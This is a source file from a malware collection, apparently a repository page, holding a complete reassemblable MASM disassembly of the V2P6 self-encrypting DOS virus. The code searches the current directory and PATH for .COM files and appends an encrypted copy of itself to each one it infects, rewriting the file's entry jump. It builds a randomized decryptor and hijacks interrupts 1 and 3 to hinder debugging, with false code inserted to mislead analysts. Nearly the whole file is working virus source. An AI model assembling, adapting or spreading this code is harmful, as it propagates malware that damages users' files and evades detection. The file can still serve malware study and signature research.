MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.v2p6.asm

1099 lines
21 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;**********************************************
; *
; V2P6.ASM *
; a *
; recompilable disassembly *
; of *
; Mark Washburn's V2P6 *
; self-encrypting, *
; variable-length *
; virus *
; - *
; WRITTEN FOR REASSEMBLY *
; WITH MICROSOFT MASM ASSEMBLER. *
; *
; *
; 1) The V2P6 uses a "sliding-window" *
; encryption technique that relies on *
; Interrupts One and Three. The *
; "INSERT_ENCRYPTION_TECHNIQUES" call *
; inserts the appropriate code for *
; this task. *
; *
; 2) Occasionally, NOPS and Interrupt 3 *
; calls are used as "false code" that *
; is designed to confuse those who *
; attempt to disassemble the virus. *
; THEY are not true INT 3 or NOP *
; instructions. These attempts are *
; clearly labeled as such. *
; *
;**********************************************
CODE_SEG SEGMENT
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
ORG 0100H
V2P6 PROC NEAR
THE_BEGINNING:
JMP SHORT DEGARBLER
DB " V2P6.ASM "
DEGARBLER:
CALL INSERT_ENCRYPTION_TECHNIQUES
DB 36 DUP (090H)
;========== Body encryption takes place from here down ===========
START:
MOV BP,SP
SUB SP,029H
PUSH CX
MOV DX,OFFSET VARIABLE_CODE
MOV WORD PTR[BP-014H],DX
CLI
CLD
STORE_INTERRUPT_ADDRESSES:
PUSH DS
MOV AX,0
PUSH AX
POP DS
CLI
MOV AX,DS:WORD PTR[4]
MOV WORD PTR[BP-028H],AX
MOV AX,DS:WORD PTR[6]
MOV WORD PTR[BP-026H],AX
MOV AX,DS:WORD PTR[0CH]
MOV WORD PTR[BP-024H],AX
MOV AX,DS:WORD PTR[0EH]
MOV WORD PTR[BP-022H],AX
STI
POP DS
REPLACE_INTERRUPT_ADDRESSES:
CALL REPLACE_ONE_AND_THREE
MOV SI,DX
ADD SI,0E4H
MOV DI,0100H
MOV CX,3
CLD
REP MOVSB
CHECK_DOS_VERSION:
MOV SI,DX
MOV AH,030H
INT 021H
CMP AL,0
NOP ;Breakpoint Encryption.
NOP
JNE STORE_THE_DTA
JMP EXIT
STORE_THE_DTA:
PUSH ES
MOV AH,02FH
INT 021H
NOP ;Breakpoint Encryption.
NOP
MOV WORD PTR[BP-4],BX
NOP ;Breakpoint Encryption.
NOP
MOV WORD PTR[BP-2],ES
POP ES
SET_NEW_DTA:
MOV DX,SI
ADD DX,0135H
MOV AH,01AH
INT 021H
PUSH ES
PUSH SI
MOV ES,DS:WORD PTR[02CH]
MOV DI,0H
FIND_ENVIRONMENT:
POP SI
PUSH SI
ADD SI,0F0H
LODSB
MOV CX,08000H
REPNE SCASB
MOV CX,4H
LOOOPER:
LODSB
SCASB
JNE FIND_ENVIRONMENT
LOOP LOOOPER
POP SI
POP ES
MOV WORD PTR[BP-0CH],DI
MOV BX,SI
ADD SI,0F5H
MOV DI,SI
JMP SHORT COPY_FILE_SPEC_TO_WORK_AREA
NOP
INT 3 ;False code.
NO_FILE_FOUND:
CMP WORD PTR[BP-0CH],0
JNE FOLLOW_THE_PATH
JMP RESTORE_DTA
INT 3 ;False code.
FOLLOW_THE_PATH:
PUSH DS
PUSH SI
MOV DS,ES:WORD PTR[02CH]
MOV DI,SI
MOV SI,ES:WORD PTR[BP-0CH]
ADD DI,0F5H
UP_TO_LODSB:
LODSB
CMP AL,03BH
JE SEARCH_AGAIN
CMP AL,0
JE CLEAR_SI
STOSB
JMP SHORT UP_TO_LODSB
INT 3 ;False code.
CLEAR_SI:
MOV SI,0
SEARCH_AGAIN:
POP BX
POP DS
MOV WORD PTR[BP-0CH],SI
CMP CH,0FFH
JE COPY_FILE_SPEC_TO_WORK_AREA
MOV AL,05CH
STOSB
COPY_FILE_SPEC_TO_WORK_AREA:
MOV WORD PTR[BP-0EH],DI
MOV SI,BX
ADD SI,0EAH
MOV CX,6
REP MOVSB
MOV SI,BX
MOV AH,04EH
MOV DX,SI
ADD DX,0F5H
MOV CX,3
INT 021H
JMP SHORT CHECK_CARRY_FLAG
NOP ;False code.
INT 3
FIND_NEXT_FILE:
MOV AH,04FH
INT 021H
CHECK_CARRY_FLAG:
JAE FILE_FOUND
JMP SHORT NO_FILE_FOUND
INT 3 ;False code.
FILE_FOUND:
MOV AX,WORD PTR[SI+014BH]
AND AL,01FH
CMP AL,01FH
JE FIND_NEXT_FILE
CMP WORD PTR[SI+014FH],0F902H
JE FIND_NEXT_FILE
CMP WORD PTR[SI+014FH],0AH
JE FIND_NEXT_FILE
MOV DI,WORD PTR[BP-0EH]
PUSH SI
ADD SI,0153H
MOVE_ASCII_FILENAME:
LODSB
STOSB
CMP AL,0
JNE MOVE_ASCII_FILENAME
POP SI
GET_FILE_ATTRIBUTE:
MOV AX,04300H
MOV DX,SI
ADD DX,0F5H
INT 021H
STORE_FILE_ATTRIBUTE:
MOV WORD PTR[BP-0AH],CX
CLEAR_FILE_ATTRIBUTE:
MOV AX,04301H
AND CX,-2
MOV DX,SI
ADD DX,0F5H
INT 021H
OPEN_FILE:
MOV AX,03D02H
MOV DX,SI
ADD DX,0F5H
INT 021H
JAE GET_DATE_AND_TIME
JMP SET_THE_ATTRIBUTE
INT 3 ;False code.
GET_DATE_AND_TIME:
MOV BX,AX
MOV AX,05700H
INT 021H
STORE_DATE_AND_TIME:
MOV WORD PTR[BP-8],CX
MOV WORD PTR[BP-6],DX
READ_FIRST_THREE_BYTES:
MOV AH,03FH
MOV CX,3
MOV DX,SI
ADD DX,0E4H
INT 021H
NOP ;Breakpoint Encryption.
NOP
JB ERROR_OCCURRED
NOP ;Breakpoint Encryption.
NOP
CMP AX,3
NOP ;Breakpoint Encryption.
NOP
JNE ERROR_OCCURRED
NOP ;Breakpoint Encryption.
NOP
GET_FILE_LENGTH:
MOV AX,04202H
NOP ;Breakpoint Encryption.
NOP
MOV CX,0
MOV DX,0
INT 021H
JAE AT_END_OF_FILE
ERROR_OCCURRED:
JMP SET_DATE_AND_CLOSE_FILE
AT_END_OF_FILE:
NOP ;Breakpoint Encryption.
NOP
PUSH BX
NOP ;Breakpoint Encryption.
NOP
MOV CX,AX
PUSH CX
NOP ;Breakpoint Encryption.
NOP
SUB AX,3
NOP ;Breakpoint Encryption.
NOP
MOV WORD PTR[SI+0E8H],AX
ADD CX,06CDH
NOP ;Breakpoint Encryption.
NOP
MOV DI,SI
NOP ;Breakpoint Encryption.
NOP
SUB DI,059FH
NOP ;Breakpoint Encryption.
NOP
MOV WORD PTR[DI],CX
MOV AH,02CH
INT 021H
XOR DX,CX
NOP ;Breakpoint Encryption.
NOP
MOV CX,WORD PTR[SI+0E2H]
NOP ;Breakpoint Encryption.
NOP
XOR CX,DX
NOP ;Breakpoint Encryption.
NOP
MOV WORD PTR[SI+0E2H],DX
NOP ;Breakpoint Encryption.
NOP
MOV WORD PTR[BP-01EH],DX
CREATE_THE_DEGARBLER:
CALL DEGARB_CALL_THREE
MOV AL,BYTE PTR[BP-01EH]
AND AL,3
CMP AL,3
JE CREATE_THE_DEGARBLER
PUSH AX
ROR AL,1
NOP ;Breakpoint Encryption.
NOP
ROR AL,1
NOP ;Breakpoint Encryption.
NOP
MOV BYTE PTR[SI+O10H],AL
POP AX
ADD AL,2
NOP ;Breakpoint Encryption.
NOP
MOV BYTE PTR[SI+O3CH],AL
CREATE_DEGARBLER_PART_TWO:
CALL DEGARB_CALL_THREE
MOV AL,BYTE PTR[BP-01EH]
AND AL,7
CMP AL,6
JA CREATE_DEGARBLER_PART_TWO
NOP ;Breakpoint Encryption.
NOP
MOV BYTE PTR[BP-01BH],AL
PUSH AX
NOP ;Breakpoint Encryption.
NOP
XOR AH,AH
SHL AX,1
NOP ;Breakpoint Encryption.
NOP
INC AX
NOP ;Breakpoint Encryption.
NOP
MOV BX,SI
ADD BX,[O5CH]
ADD BX,AX
NOP ;Breakpoint Encryption.
NOP
MOV DL,BYTE PTR[BX]
POP AX
NOP ;Breakpoint Encryption.
NOP
CMP AL,3
JA CREATE_DEGARBLER_PART_FOUR
CREATE_DEGARBLER_PART_THREE:
CALL DEGARB_CALL_THREE
AND AL,DL
JE CREATE_DEGARBLER_PART_THREE
NOP ;Breakpoint Encryption.
NOP
MOV BYTE PTR[BP-01CH],AL
NOP ;Breakpoint Encryption.
NOP
PUSH AX
MOV BL,AL
NOP ;Breakpoint Encryption.
NOP
NOT BL
AND DL,BL
NOP ;Breakpoint Encryption.
NOP
CALL DEGARB_CALL_TWO
MOV AL,DL
NOP ;Breakpoint Encryption.
NOP
XOR DH,DH
SHL DX,1
NOP ;Breakpoint Encryption.
NOP
MOV BX,SI
ADD BX,[O24H]
ADD BX,DX
NOP ;Breakpoint Encryption.
NOP
MOV BX,WORD PTR[BX]
MOV WORD PTR[SI+ODH],BX
NOP ;Breakpoint Encryption.
NOP
MOV BL,080H
MOV BYTE PTR[BP-010H],BL
NOP ;Breakpoint Encryption.
NOP
POP DX
CALL DEGARB_CALL_TWO
NOP ;Breakpoint Encryption.
NOP
MOV DH,DL
NOP ;Breakpoint Encryption.
NOP
MOV DL,AL
JMP SHORT CREATE_DEGARBLER_PART_FIVE
CREATE_DEGARBLER_PART_FOUR:
NOP ;Breakpoint Encryption.
NOP
MOV BYTE PTR[BP-01CH],DL
NOP ;Breakpoint Encryption.
NOP
CALL DEGARB_CALL_TWO
NOP ;Breakpoint Encryption.
NOP
MOV DH,DL
NOP ;Breakpoint Encryption.
NOP
REAL_NOPS:
MOV BX,09090H
MOV WORD PTR[SI+ODH],BX
NOP ;Breakpoint Encryption.
NOP
XOR DL,DL
NOP ;Breakpoint Encryption.
NOP
MOV BYTE PTR[BP-010H],DL
MOV DL,0FFH
CREATE_DEGARBLER_PART_FIVE:
CALL DEGARB_CALL_THREE
MOV AL,BYTE PTR[BP-01EH]
AND AL,0FH
CMP AL,0CH
JA CREATE_DEGARBLER_PART_FIVE
CMP AL,DH
JE CREATE_DEGARBLER_PART_FIVE
CMP AL,DL
JE CREATE_DEGARBLER_PART_FIVE
MOV BYTE PTR[BP-0FH],AL
XOR AH,AH
SHL AX,1
SHL AX,1
MOV BX,SI
ADD BX,[O6AH]
ADD BX,AX
MOV CL,BYTE PTR[BX]
MOV AL,031H
TEST CL,8
JNE OVER_ONE
MOV AL,030H
OVER_ONE:
MOV BYTE PTR[SI+0DBH],AL
MOV BYTE PTR[SI+OFH],AL
MOV AL,5
TEST CL,8
JNE OVER_SEVERAL
TEST CL,4
JE OVER_SEVERAL
MOV AL,025H
OVER_SEVERAL:
MOV BYTE PTR[SI+0DCH],AL
MOV AL,BYTE PTR[SI+O10H]
AND CL,7
XOR CH,CH
SHL CX,1
SHL CX,1
SHL CX,1
OR AL,CL
MOV CL,BYTE PTR[BP-01BH]
SHL CX,1
MOV BX,SI
ADD BX,[O5CH]
ADD BX,CX
MOV CL,BYTE PTR[BX]
OR AL,CL
MOV BYTE PTR[SI+O10H],AL
MOV BX,SI
ADD BX,[O6AH]
XOR CL,CL
MOV BYTE PTR[BP-01BH],CL
MOV AL,BYTE PTR[BP-0FH]
CMP AL,9
JA THREE_ADJUSTMENTS
XOR AH,AH
SHL AX,1
SHL AX,1
ADD BX,AX
INC BX
MOV AL,BYTE PTR[BX]
MOV BYTE PTR[SI+O1BH],AL
INC BX
INC BX
MOV AL,BYTE PTR[BX]
MOV BYTE PTR[SI+O6],AL
MOV BX,SI
ADD BX,[O6AH]
JMP SHORT NO_ADJUSTMENT
INT 3 ;False code.
THREE_ADJUSTMENTS:
MOV CL,0FFH
MOV BYTE PTR[BP-01BH],CL
MOV CL,090H
MOV BYTE PTR[SI+O1BH],CL
MOV CL,0B8H
MOV BYTE PTR[SI+O6],CL
NO_ADJUSTMENT:
MOV DL,BYTE PTR[BP-01CH]
CALL DEGARB_CALL_TWO
XOR DH,DH
SHL DX,1
SHL DX,1
ADD BX,DX
INC BX
INC BX
MOV AL,BYTE PTR[BX]
MOV BYTE PTR[SI+O1AH],AL
INC BX
MOV AL,BYTE PTR[BX]
MOV BYTE PTR[SI+ZERO],AL
NOP ;Breakpoint Encryption.
NOP
CALL DEGARB_CALL_THREE
NOP ;Breakpoint Encryption.
NOP
MOV AX,WORD PTR[BP-01EH]
AND AX,0FFH
ADD AX,0709H
MOV WORD PTR[BP-018H],AX
MOV WORD PTR[SI+O4],AX
POP CX
ADD CX,0127H
MOV WORD PTR[SI+O1],CX
MOV CL,BYTE PTR[BP-01BH]
OR CL,CL
JNE CREATE_DEGARBLER_PART_SIX
NOP ;Breakpoint Encryption.
NOP
CALL DEGARB_CALL_THREE
MOV AX,WORD PTR[BP-01EH]
MOV WORD PTR[SI+O7],AX
CREATE_DEGARBLER_PART_SIX:
MOV WORD PTR[BP-016H],AX
MOV DI,SI
SUB DI,05CDH
NOP ;Breakpoint Encryption.
NOP
MOV AX,3
MOV CL,BYTE PTR[BP-010H]
OR AL,CL
MOV CL,BYTE PTR[BP-01BH]
OR CL,CL
JNE OVER_OR
OR AX,4
OVER_OR:
MOV BX,SI
ADD BX,[O2CH]
MOV WORD PTR[BP-01AH],AX
CALL DEGARB_CALL_FIVE
MOV WORD PTR[BP-012H],DI
REAL_NOP:
ADD BX,[OO10H]
NOP ;Breakpoint Encryption.
NOP
MOV AX,1
CALL DEGARB_CALL_ONE
MOV WORD PTR[BP-01AH],AX
NOP ;Breakpoint Encryption.
NOP
CALL DEGARB_CALL_FIVE
ADD BX,[OO10H]
MOV AX,1
MOV CL,BYTE PTR[BP-01BH]
OR CL,CL
JNE OVER_THE_OR
OR AX,2
OVER_THE_OR:
CALL DEGARB_CALL_ONE
MOV WORD PTR[BP-01AH],AX
NOP ;Breakpoint Encryption.
NOP
CALL DEGARB_CALL_FIVE
MOV CX,2
MOV SI,WORD PTR[BP-014H]
NOP ;Breakpoint Encryption.
NOP
ADD SI,[O22H]
REP MOVSB
MOV AX,WORD PTR[BP-012H]
SUB AX,DI
DEC DI
STOSB
LAST_STEP:
MOV CX,WORD PTR[BP-014H]
SUB CX,05A6H
CMP CX,DI
JE COPY_ENC_AND_WRITE_TO_MEMORY
MOV DX,0
CALL DEGARB_CALL_FOUR
JMP SHORT LAST_STEP
INT 3 ;False code.
COPY_ENC_AND_WRITE_TO_MEMORY:
MOV SI,WORD PTR[BP-014H]
PUSH SI
MOV DI,SI
NOP ;Breakpoint Encryption.
NOP
MOV CX,044H
ADD SI,09EH
NOP ;Breakpoint Encryption.
NOP
ADD DI,0262H
MOV DX,DI
REP MOVSB
POP SI
POP BX
CALL GET_OFFSET
ADD AX,6
PUSH AX
JMP DX
WRITE_NEW_JUMP:
NOP ;Breakpoint Encryption.
NOP
JB SET_DATE_AND_CLOSE_FILE
MOV AX,04200H
MOV CX,0
MOV DX,0
INT 021H
JB SET_DATE_AND_CLOSE_FILE
MOV AH,040H
MOV CX,3
NOP ;Breakpoint Encryption.
NOP
MOV DX,SI
ADD DX,0E7H
INT 021H
SET_DATE_AND_CLOSE_FILE:
MOV DX,WORD PTR[BP-6]
MOV CX,WORD PTR[BP-8]
AND CX,-020H
OR CX,01FH
MOV AX,05701H
INT 021H
MOV AH,03EH
INT 021H
SET_THE_ATTRIBUTE:
MOV AX,04301H
MOV CX,WORD PTR[BP-0AH]
MOV DX,SI
ADD DX,0F5H
INT 021H
RESTORE_DTA:
PUSH DS
MOV DX,WORD PTR[BP-4]
MOV DS,WORD PTR[BP-2]
MOV AH,01AH
INT 021H
POP DS
EXIT:
POP CX
MOV SP,BP
MOV DI,0100H
PUSH DI
XOR AX,AX
XOR BX,BX
XOR CX,CX
XOR DX,DX
XOR SI,SI
XOR BP,BP
XOR DI,DI
JMP RESTORE_ONE_AND_THREE
;========= Calls used to create the Degarbler ===========
DEGARB_CALL_ONE:
PUSH AX
CALL DEGARB_CALL_THREE
MOV CL,AL
MOV CH,BYTE PTR[BP-01EH]
POP AX
CMP CH,080H
JA TO_RET
XOR CH,CH
OR AX,CX
TO_RET:
RET
DEGARB_CALL_TWO:
PUSH AX
MOV AL,0
UP_TO_SHIFT:
SHR DL,1
JB RIGHT_HERE
INC AL
JMP SHORT UP_TO_SHIFT
RIGHT_HERE:
MOV DL,AL
POP AX
RET
INT 3 ;False code.
DEGARB_CALL_THREE:
MOV CX,WORD PTR[BP-01EH]
XOR CX,0813CH
ADD CX,09249H
ROR CX,1
ROR CX,1
ROR CX,1
MOV WORD PTR[BP-01EH],CX
AND CX,7
PUSH CX
INC CX
XOR AX,AX
STC
RCL AX,CL
POP CX
RET
GET_OFFSET:
POP AX
PUSH AX
RET
DEGARB_CALL_FOUR:
CALL DEGARB_CALL_THREE
TEST DX,AX
JNE DEGARB_CALL_FOUR
OR DX,AX
MOV AX,CX
SHL AX,1
PUSH AX
XLATB
MOV CX,AX
POP AX
INC AX
XLATB
ADD AX,WORD PTR[BP-014H]
MOV SI,AX
REP MOVSB
RET
DEGARB_CALL_FIVE:
MOV DX,0
PRETTY_PLACE:
CALL DEGARB_CALL_FOUR
MOV AX,DX
AND AX,WORD PTR[BP-01AH]
CMP AX,WORD PTR[BP-01AH]
JNE PRETTY_PLACE
RET
;====== Encryption and debugger stopping routines =======
NEW_INT_THREE:
PUSH BX
MOV BX,SP
PUSH AX
PUSH SI
PUSH DS
PUSH CS
POP DS
OR BYTE PTR[BX+7],1
MOV SI,WORD PTR[BX+2]
INC WORD PTR[BX+2]
MOV WORD PTR[BP-020H],SI
LODSB
XOR BYTE PTR[SI],AL
IN AL,021H
MOV BYTE PTR[BP-029H],AL
MOV AL,0FFH
OUT 021H,AL
POP DS
POP SI
POP AX
POP BX
IRET
NEW_INT_ONE:
PUSH BX
MOV BX,SP
PUSH AX
AND SS:BYTE PTR[BX+7],0FEH
MOV BX,WORD PTR[BP-020H]
MOV AL,CS:BYTE PTR[BX]
XOR CS:BYTE PTR[BX+1],AL
MOV AL,BYTE PTR[BP-029H]
OUT 021H,AL
MOV AL,020H
OUT 020H,AL
POP AX
POP BX
IRET
REPLACE_ONE_AND_THREE:
PUSHF
PUSH DS
PUSH AX
MOV AX,0
PUSH AX
POP DS
MOV AX,WORD PTR[BP-014H]
SUB AX,093H
CLI
MOV DS:WORD PTR[000CH],AX
MOV AX,WORD PTR[BP-014H]
SUB AX,06DH
MOV DS:WORD PTR[0004],AX
PUSH CS
POP AX
MOV DS:WORD PTR[0006],AX
MOV DS:WORD PTR[000EH],AX
STI
POP AX
POP DS
POPF
RET
RESTORE_ONE_AND_THREE:
PUSHF
PUSH DS
PUSH AX
MOV AX,0
PUSH AX
POP DS
MOV AX,WORD PTR[BP-024H]
CLI
MOV DS:WORD PTR[000CH],AX
MOV AX,WORD PTR[BP-028H]
MOV DS:WORD PTR[0004],AX
MOV AX,WORD PTR[BP-026H]
MOV DS:WORD PTR[0006],AX
MOV AX,WORD PTR[BP-022H]
MOV DS:WORD PTR[000EH],AX
STI
POP AX
POP DS
POPF
RET
;============= The Variable Code ===============
VARIABLE_CODE:
MOV SI,0
MOV CX,0
MOV DX,0
NOP
CLC
STC
CLD
XOR BP,BP
XORING_HERE:
XOR WORD PTR[BP+SI],DX
ADD BYTE PTR[BX+SI],AL
STC
CMC
CLC
CLD
STI
NOP
CLC
INC SI
DEC DX
CLD
CMC
STI
CLC
STC
NOP
LOOP XORING_HERE
XOR BP,BP
XOR BX,BX
XOR DI,DI
XOR SI,SI
ADD AX,WORD PTR[BX+SI]
ADD AX,WORD PTR[BP+DI]
ADD AX,DS:WORD PTR[0901H]
ADD WORD PTR[BP+SI],CX
ADD WORD PTR[BP+DI],CX
ADD WORD PTR[SI],CX
ADD CL,BYTE PTR[DI]
ADD CL,BYTE PTR[BX]
ADD WORD PTR[BP+DI],DX
ADD WORD PTR[SI],DX
ADD WORD PTR[DI],DX
ADD DS:WORD PTR[01701H],DX
ADD WORD PTR[BX+SI],BX
ADD WORD PTR[BX+DI],BX
ADD WORD PTR[BP+SI],BX
ADD WORD PTR[BP+DI],BX
ADD WORD PTR[SI],BX
ADD WORD PTR[DI],BX
ADD DS:WORD PTR[01F01H],BX
ADD WORD PTR[BX+SI],SP
ADD WORD PTR[BX+DI],SP
ADD BYTE PTR[BP+SI],CL
ADD DS:WORD PTR[0902H],AX
ADD AX,WORD PTR[DI]
ADD AL,8
ADD AX,0704H
ADD CL,BYTE PTR[DI]
DEC BP
INC BP
MOV BP,04B0BH
INC BX
MOV BX,04F0FH
INC DI
MOV DI,04E0EH
INC SI
MOV SI,04808H
INC AX
MOV AX,04800H
INC AX
MOV AX,04804H
INC AX
MOV AX,04A0AH
INC DX
MOV DX,04A02H
INC DX
MOV DX,04A06H
INC DX
MOV DX,9
ADD BYTE PTR[BX+SI],AL
ADD WORD PTR[BX+SI],AX
ADD BYTE PTR[BX+SI],AL
ADD AX,0
DB 0
;======= Only the Memory Image of the following code =====
;======= is ever executed =====
ENCRYPT_WRITE_AND_DECRYPT:
MOV CX,WORD PTR[BP-018H]
MOV AX,WORD PTR[BP-016H]
MOV DI,SI
SUB DI,05A6H
CALL ENCRYPT_BODY
MOV AH,040H
MOV DX,WORD PTR[BP-01EH]
AND DX,0FFH
MOV CX,WORD PTR[BP-018H]
ADD CX,[O27H]
ADD CX,DX
MOV DX,SI
SUB DX,05CDH
INT 021H
PUSHF
PUSH AX
MOV CX,WORD PTR[BP-018H]
MOV AX,WORD PTR[BP-016H]
MOV DI,SI
SUB DI,05A6H
CALL ENCRYPT_BODY
POP AX
POPF
RET
ENCRYPT_BODY:
XOR WORD PTR[DI],AX
DEC AX
INC DI
LOOP ENCRYPT_BODY
RET
;================= Data Section begins here ===============
RANDOM_KEY:
DB 006H, 02CH
STORAGE_OF_INITIAL_JUMP:
DB 0E9H, 0FDH, 0FEH
NEW_JUMP_INSTRUCTION:
DB 0E9H, 00, 00
FILE_SPEC:
DB "*.COM", 00
OFFSET_OF_PATH:
DB "PATH="
WORK_AREA:
DB 64 DUP (0)
NEW_DTA:
DB 30 DUP (0)
TARGET_FILE_NAME:
DB 13 DUP (0)
;============ THE FOLLOWING IS NOT PART OF THE VIRUS =============
; Needed to insert initial random encryption values, etc. for the
; first time. Values used here may correspond to Washburn's original
; values. They were obtained from a sample of V2P6 which might have
; been an original compilation of the virus by its author.
INSERT_ENCRYPTION_TECHNIQUES:
XOR BP,BP
MOV BX,OFFSET TRANS_TABLE
MOV SI,OFFSET START
MOV DI,OFFSET REAL_NOPS
MOV DX,OFFSET REAL_NOP
INC DI
ADD DX,3
SEARCH_FOR_NOPS:
INC SI
CMP SI,OFFSET EXIT
JE ANOTHER_RET
CMP SI,DI
JE LEAVE_IN
CMP SI,DX
JE LEAVE_IN
CMP WORD PTR[SI],09090H
JNE SEARCH_FOR_NOPS
CALL INSERT_BREAKPOINT_AND_XORING_VALUE
LEAVE_IN:
JMP SHORT SEARCH_FOR_NOPS
INSERT_BREAKPOINT_AND_XORING_VALUE:
MOV BYTE PTR[SI],0CCH
MOV AX,BP
XLATB
MOV BYTE PTR[SI+1],AL
XOR BYTE PTR[SI+2],AL
INC BP
ANOTHER_RET:
RET
TRANS_TABLE:
DB 08BH, 060H, 0D4H, 0C6H, 048H, 057H, 016H, 06EH
DB 0D3H, 087H, 080H, 000H, 090H, 07EH, 051H, 056H
DB 056H, 0F6H, 062H, 074H, 072H, 072H, 032H, 00AH
DB 0AFH, 03BH, 0AAH, 0BBH, 0FAH, 041H, 038H, 009H
DB 02FH, 0ABH, 0DCH, 0E5H, 004H, 010H, 08EH, 01FH
DB 00DH, 04FH, 0F7H, 002H, 0F0H, 002H, 050H, 036H
DB 04AH, 037H, 04AH, 077H, 0B2H, 07AH, 0B1H, 07AH
DB 031H
O10H EQU 010H
O3CH EQU 03CH
ODH EQU 0DH
OFH EQU 0FH
O1BH EQU 01BH
O6 EQU 06
O1AH EQU 01AH
O4 EQU 04
O7 EQU 07
O5CH EQU 05CH
O24H EQU 024H
O6AH EQU 06AH
O1 EQU 01
O2CH EQU 02CH
OO10H EQU 0010H
O22H EQU 022H
O27H EQU 027H
ZERO EQU 0
V2P6 ENDP
CODE_SEG ENDS
END V2P6
2021-01-13 00:04:54 +00:00